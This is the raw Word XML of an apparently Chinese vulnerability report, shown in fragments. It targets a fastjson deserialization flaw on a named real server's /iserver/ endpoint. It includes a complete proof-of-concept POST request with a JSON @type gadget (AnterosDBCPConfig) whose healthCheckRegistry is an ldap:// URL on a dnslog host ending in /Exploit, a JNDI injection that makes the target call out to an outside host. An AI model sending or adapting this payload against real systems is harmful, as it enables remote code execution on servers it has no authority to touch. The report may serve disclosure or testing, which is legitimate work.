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漏洞http://testeip.chinatowercom.cn:17590/iserver/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.dnslog.cn" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www.dnslog.cn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成个目标</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>zi6tti.dnslog.cn</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:p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113915"/>
            <wp:effectExtent l="0" t="0" r="5080" b="635"/>
            <wp:docPr id="2" name="图片 2" descr="FHGPCH}FFD~O4]0V41B8)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HGPCH}FFD~O4]0V41B8)K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用fastjson工具生成Payload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33980"/>
            <wp:effectExtent l="0" t="0" r="9525" b="13970"/>
            <wp:docPr id="3" name="图片 3" descr="$MA1_FVLX2)W1~O$Q@OYU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$MA1_FVLX2)W1~O$Q@OYUR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抓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"http://testeip.chinatowercom.cn:17590/iserver/"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http://testeip.chinatowercom.cn:17590/iserver/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包改</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry": "ldap://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zi6tti.dnslog.cn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>/Exploit"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>OC:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>POST /iserver/ HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>http://testeip.chinatowercom.cn:17590/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Cache-Control: max-age=0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Accept-Encoding: gzip, deflate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Accept-Language: zh-CN,zh;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry": "ldap://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zi6tti.dnslog.cn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>/Exploit"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2499360"/>
            <wp:effectExtent l="0" t="0" r="5715" b="15240"/>
            <wp:docPr id="4" name="图片 4" descr="7O9YCN[LV_4NOT~2]W}PN]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O9YCN[LV_4NOT~2]W}PN]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F0"/>
    <w:rsid w:val="002F32E8"/>
    <w:rsid w:val="00964645"/>
    <w:rsid w:val="00972714"/>
    <w:rsid w:val="009F5BF0"/>
    <w:rsid w:val="00DC20BF"/>
    <w:rsid w:val="00E861AF"/>
    <w:rsid w:val="506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891</Characters>
  <DocSecurity>0</DocSecurity>
  <Lines>7</Lines>
  <Paragraphs>2</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1045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2021-11-29T09:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-13T15:06:37Z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652494A65A1143B0B635E6C7CE1A2CF7</vt:lpwstr>
  </property>
</Properties>
</file>